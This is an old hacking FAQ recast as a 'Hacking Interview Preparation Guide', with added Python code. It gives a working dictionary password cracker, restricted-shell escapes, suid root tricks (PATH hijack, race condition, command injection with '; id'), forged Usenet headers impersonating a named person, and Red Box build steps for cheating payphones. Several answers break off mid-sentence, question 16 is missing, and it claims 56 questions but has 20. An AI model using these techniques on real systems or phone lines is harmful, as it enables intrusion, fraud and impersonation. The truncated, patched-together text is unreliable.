Hacking Interview Preparation Guide

The terms hack and hacking originally refer to modifying a program or device to give the user access to features that were otherwise unavailable, such as by circuit bending. From that usage the word came to describe more nefarious criminal uses such as identity theft, credit card fraud, or other actions categorized as computer crime. Use the questions below to prepare for a job interview related to hacking.

56 Hacking Questions and Answers:

1 :: How do I access the password file under Unix?

In standard Unix the password file is /etc/passwd. On a Unix system
that uses either NIS/yp or password shadowing, much of the password
data lives elsewhere: NIS serves it from the passwd map, and shadowing
moves the hashes into a file only root can read (/etc/shadow on Linux
and most current systems), leaving a placeholder in /etc/passwd.

2 :: How do I crack Unix passwords?

Contrary to popular belief, Unix passwords cannot be decrypted. Unix
passwords are hashed with a one-way function (traditionally crypt(3),
a DES-based scheme). The login program runs the text you enter at the
"password:" prompt through the same function and compares the result
against the stored hash of your password.

Password cracking software therefore guesses. Each word in a wordlist
is hashed and the result is compared to the stored hash of the target
account. Traditional crypt(3) mixes in a two-character salt (4096
possible values), stored as the first two characters of the hash, so
the same password hashes differently on different accounts. A cracker
reads the salt from each target, so it only has to hash every word once
per distinct salt rather than for all 4096; what the salt does prevent
is precomputing one table of hashes that works against every account.

The best cracking program for Unix passwords is currently Crack by
Alec Muffett. For PC-DOS, the best package to use is currently
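
As an added example (not part of the original FAQ, and not Crack's own code), the Python below shows the structure of such a cracker: it parses passwd-format lines, skips entries whose password field is only a shadow or lock placeholder, reads the salt from each stored hash, and hashes every candidate word once per distinct salt rather than once per account. The hash function toy_crypt is an assumption: it stands in for crypt(3) with a SHA-256 construction that keeps crypt's shape (two-character salt prepended to the hash), because the DES-based crypt is no longer in the Python standard library. The sample entries and wordlist are constructed.

```python
import hashlib
from collections import defaultdict

# Field-2 values that mean "no hash here": shadowed ('x'), locked ('*', '!'), empty.
SHADOW_PLACEHOLDERS = ("", "x", "*", "!")


def toy_crypt(word: str, salt: str) -> str:
    """Assumed stand-in for crypt(3): a salted one-way hash whose output
    starts with the two-character salt, like traditional 13-character DES
    crypt output. (SHA-256 here; the real scheme is DES-based.)"""
    digest = hashlib.sha256((salt + word).encode()).hexdigest()
    return salt + digest[:11]


def parse_passwd(text: str):
    """Yield (user, stored_hash) for every line that carries a real hash.
    Shadowed, locked and empty password fields are skipped: there is
    nothing in /etc/passwd to crack for those accounts."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:            # name:hash:uid:gid:gecos:dir:shell
            continue
        user, stored = fields[0], fields[1]
        if stored in SHADOW_PLACEHOLDERS or stored[0] in "*!":
            continue
        yield user, stored


def crack(passwd_text: str, wordlist, hash_fn=toy_crypt):
    """Dictionary attack. Targets are grouped by salt (the first two
    characters of the stored hash) so each word is hashed once per
    distinct salt, not once per account, which is the optimisation that
    makes Crack fast. Returns ({user: password}, number_of_hash_calls)."""
    by_salt = defaultdict(list)
    for user, stored in parse_passwd(passwd_text):
        by_salt[stored[:2]].append((user, stored))

    found, hash_calls = {}, 0
    for word in wordlist:
        for salt, targets in by_salt.items():
            candidate = hash_fn(word, salt)
            hash_calls += 1
            for user, stored in targets:
                if candidate == stored:
                    found[user] = word
    return found, hash_calls


# Constructed sample: two accounts share the salt "ab", one uses "cd",
# one is shadowed and one is locked. Hashes are built with toy_crypt.
SAMPLE_PASSWD = "\n".join([
    "root:" + toy_crypt("toor", "ab") + ":0:0:root:/root:/bin/sh",
    "alice:" + toy_crypt("secret", "ab") + ":1000:1000:Alice:/home/alice:/bin/sh",
    "bob:" + toy_crypt("hunter2", "cd") + ":1001:1001:Bob:/home/bob:/bin/sh",
    "carol:x:1002:1002:Carol:/home/carol:/bin/sh",
    "daemon:*:2:2:daemon:/sbin:/sbin/nologin",
])
WORDLIST = ["password", "secret", "toor", "letmein"]

if __name__ == "__main__":
    found, calls = crack(SAMPLE_PASSWD, WORDLIST)
    print(found)   # {'root': 'toor', 'alice': 'secret'}
    print(calls)   # 8: 4 words x 2 distinct salts, not 4 x 3 accounts
```

bob survives only because "hunter2" is not in the wordlist; the salt does not slow the attack on any single account at all, it just stops one precomputed table from serving every account.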

3 :: How do I access the password file under VMS?

Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However,
unlike Unix, most users do not have access to read the password file.

4 :: How do I crack VMS passwords?

Write a program that uses the SYS$GETUAF functions to compare the
results of encrypted words against the encrypted data in SYSUAF.DAT.

Two such programs are known to exist, CHECK_PASSWORD and

5 :: What is NIS/yp?

NIS (Network Information Service) is the current name for what was once
known as yp (Yellow Pages). The purpose of NIS is to allow many
machines on a network to share configuration information, including
password data. NIS is not designed to promote system security: any
client on the network can pull the passwd map, hashes included. If
your system uses NIS you will have a very short /etc/passwd file with
a line that looks like this:

+::0:0:::

To view the real password file use this command: ypcat passwd

6 :: What is password shadowing?

Password shadowing is a security system where the encrypted password
field of /etc/passwd is replaced with a special token and the
encrypted password is stored in a separate file which is not readable
by normal system users.

On many older systems you can still obtain the hashes by writing a
program that uses successive calls to getpwent(), which asks the C
library for each entry instead of reading the file. On a properly
shadowed system this no longer helps: for an unprivileged caller
getpwent() returns the placeholder, and the hashes are only reachable
as root through getspent() or the shadow file itself.


#include <pwd.h>
#include <stdio.h>
int main(void) {
    struct passwd *p;
    while ((p = getpwent()) != NULL)  /* one entry per call, NULL at the end */
        printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
               (int)p->pw_uid, (int)p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}

7 :: How do I break out of a restricted shell?

On poorly implemented restricted shells you can break out of the
restricted environment by running a program that offers a shell
escape. A good example is vi. Run vi and use this command:

:set shell=/bin/sh

then spawn that shell using this command:

:shell

A restricted shell is only as strong as the set of programs it lets
you run: anything that can start a subprocess (editors, pagers, mail
readers, interpreters) is a way out unless it is restricted too.

8 :: How do I gain root from a suid script or program?

1. Change IFS.

If the script calls any other programs using the system() function
call, you may be able to fool it by changing IFS. IFS is the Internal
Field Separator that the shell uses to delimit words. If the program
contains a line that looks like this:

system("/bin/date");

and you change IFS to '/', the shell will then interpret the preceding
line as:

bin date

Now, if you have a program of your own in the PATH called "bin", the
suid program will run your program instead of /bin/date. To change IFS
from a Bourne shell so that the suid program inherits it, use:

IFS='/'; export IFS

Modern Bourne-compatible shells reset IFS at startup and only apply it
to the results of expansions, not to literal words, so this exact trick
is historical; the underlying bug, a privileged program trusting the
caller's environment (PATH above all), is still common.

2. Link the script to -i.

Create a symbolic link named "-i" to the script. When the kernel runs a
#! script it passes the script's name to the interpreter as its first
argument, so running "-i" causes the interpreter shell (/bin/sh) to
start up in interactive mode with the script's privileges. This only
works on suid shell scripts, and only on kernels that honour the suid
bit on scripts at all (Linux ignores it).

% ln -s suid.sh -- -i
% -i

(the second command relies on the current directory being on your PATH).

3. Exploit a race condition.

The kernel opens the script to read the #! line and then starts the
interpreter, which opens the script again by name. Replace a symbolic
link to the script with a link to your own program between those two
opens and the interpreter runs your program with the script's
privileges. Run the suid program at low priority to widen the window,
then swap the link:

nice -19 suidprog ; ln -s evilprog suidroot

4. Send bad input to the program.

If the program builds a shell command from what you give it without
sanitising it, invoke the name of the program and a separate command
on the same command line; the shell the program starts will run the
second command with the program's privileges.

suidprog ; id
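
Tricks 1 and 4 share one root cause: a privileged program hands a command string to /bin/sh and trusts what the caller controls, the environment and the arguments. The following Python is an added example, not from the original FAQ, that reproduces both against an unprivileged stand-in for such a wrapper and shows the fix. run_vulnerable mirrors system("date " + input): the shell resolves date through the caller's PATH, so a fake date planted by the caller runs (the PATH half of trick 1; modern shells no longer split literal command names on IFS, so that half is not shown), and an argument containing "; id" runs a second command (trick 4). run_hardened calls /bin/date by absolute path with an argv list and a fixed environment. It assumes a POSIX system with /bin/sh, /bin/date and id on the PATH; the fake date script is constructed inline.

```python
import os
import subprocess
import tempfile

BASE_PATH = "/usr/bin:/bin"   # assumed location of the real date and id


def plant_fake_date(directory: str) -> str:
    """Constructed attacker payload: a script named 'date' that will be
    found first when the attacker's directory leads the PATH."""
    path = os.path.join(directory, "date")
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho HIJACKED\n")
    os.chmod(path, 0o755)
    return path


def run_vulnerable(user_arg: str, env: dict) -> str:
    """Mirrors system("date " + user_arg) inside a privileged wrapper:
    /bin/sh -c with the caller's environment and unquoted caller input.
    Returns the command's stdout."""
    result = subprocess.run("date " + user_arg, shell=True, env=env,
                            capture_output=True, text=True)
    return result.stdout


def run_hardened(user_arg: str) -> str:
    """Absolute path, argv list (the argument is never parsed by a shell)
    and a fixed environment instead of whatever the caller exported."""
    clean_env = {"PATH": BASE_PATH}
    result = subprocess.run(["/bin/date", user_arg], env=clean_env,
                            capture_output=True, text=True)
    return result.stdout


def demo() -> dict:
    """Run the three cases and return their stdout keyed by case name."""
    with tempfile.TemporaryDirectory() as attacker_dir:
        plant_fake_date(attacker_dir)
        attacker_env = {"PATH": attacker_dir + ":" + BASE_PATH}
        return {
            # trick 1: the caller's PATH is searched first, the fake date wins
            "path_hijack": run_vulnerable("+%Y", attacker_env),
            # trick 4: ';' ends the date command and the shell then runs id
            "injection": run_vulnerable("+%Y; id", {"PATH": BASE_PATH}),
            # fixed: the whole string is just date's format argument
            "hardened": run_hardened("+%Y; id"),
        }


if __name__ == "__main__":
    for case, output in demo().items():
        print(f"{case}: {output.strip()!r}")
```

In the hardened case date prints the literal text "; id" after the year, because the argument reaches it as one argv entry and no shell ever sees it; dropping privileges with setuid(getuid()) before any such call is the other half of the fix.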

9 :: How do I fake posts to UseNet?

Use inews to post. Give inews the following header lines (the values
shown are an example):

From: Dale Drew
Newsgroups: alt.2600
Subject: Please forgive me
Message-ID: <d_drew.123@tymnet.com>
Date: Fri, 13 Jun 1994 12:15:03
Organization: Tymnet Insecurity

For a moderated newsgroup, inews will also require this line:

Then add your post and terminate with <Control-D>.

10 :: What is a Red Box?

When a coin is inserted into a payphone, the phone emits a set of
tones. A red box is a device that simulates those tones, with the
purpose of fooling the payphone into believing you have inserted an
actual coin.

11 :: How do I build a Red Box?

Red boxes are commonly made from modified Radio Shack tone dialers,
Hallmark greeting cards, or built from scratch from readily available
electronic components.

To make a Red Box from a Radio Shack tone dialer, open the dialer and
replace the crystal (the largest shiny metal component) with a crystal
close to 6.5 MHz. The most popular choice is the 6.5536 MHz crystal.
When you are finished, program the P1 button with five *'s. That will
simulate a quarter tone. Note that the tone dialer you start with
must have programmable buttons.

12 :: Which payphones will a Red Box work on?

Red Boxes will work on TelCo owned payphones, but not on COCOTs
(Customer Owned Coin Operated Telephones).

13 :: What is a Blue Box?

Blue boxes send a 2600 Hz tone down the line. Telephone switches that
use in-band signalling take that tone to mean the trunk has gone idle,
which gives the caller the same control over the switch that the
network's own signalling equipment (or an operator) has. The caller may
then route a new call with the Multi-Frequency (MF) tones provided by
the Blue Box, with the usual purpose of making free long distance calls.

14 :: Do Blue Boxes still work?

Blue Boxes still work in areas using in-band signalling. Modern
switches (ESS, Electronic Switching Systems) use out-of-band signalling
such as SS7, where the signalling travels on a separate channel from
the call: nothing you send over the voice portion of the bandwidth can
control the switch.

15 :: What is a Black Box?

A Black Box is a 10k ohm resistor placed across your phone line to
cause the phone company equipment to be unable to detect that you have
answered your telephone. People who call you will then not be billed
for the telephone call.

17 :: How do I hack ChanOp on IRC?

Find a server that is split from the rest of IRC (a netsplit) and
create your own channel there using the name of the channel you want
ChanOp on. When that server reconnects to the net, you will have
ChanOp on the real channel. If you have ServerOp on a server, you can
cause it to split on purpose. Most IRC server software now timestamps
channels and strips the ops from the younger copy when the servers
rejoin, precisely to stop this.

18 :: How do I modify the IRC client to hide my real username?

Get the IRC client source from cs.bu.edu /irc/clients. Look at the
source files irc.c and ctcp.c; the code you are looking for is fairly
easy to spot. Change the username code in irc.c and the CTCP reply
code in ctcp.c, then compile and run your client. Note that if your
host runs an identd, the server will ask it for your username and
ignore what the client sends.

19 :: What is a ringback number?

A ringback number is a number that you call that will immediately
ring the telephone from which it was called.

20 :: What is a hacking loop?

A loop is two phone numbers connected together by the phone company
for testing purposes. A loop has a high end and a low end. If you
dial the high end, you will hear nothing, not even a ring. If you
dial the low end, you will hear an annoying 1,000 Hz tone for several
seconds. If you connect to the high end and someone dials the low
end, you can speak to each other.